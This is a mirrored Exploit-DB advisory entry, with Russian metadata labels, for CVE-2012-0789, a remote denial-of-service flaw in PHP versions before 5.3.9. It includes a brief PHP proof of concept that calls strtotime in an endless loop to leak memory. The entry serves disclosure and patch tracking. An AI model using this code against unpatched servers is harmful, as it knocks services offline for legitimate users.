- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36789
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- DOS
- Платформа
- PHP
- CVE
- cve-2012-0789
- Дата публикации
- 2011-12-18
PHP 5.3.8 - Remote Denial of Service
PHP:
source: https://www.securityfocus.com/bid/52043/info
PHP is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.
PHP versions prior to 5.3.9 are vulnerable.
<?php
while (true)
{
strtotime('Monday 00:00 Europe/Paris'); // Memory leak
}
?>
- Источник
- www.exploit-db.com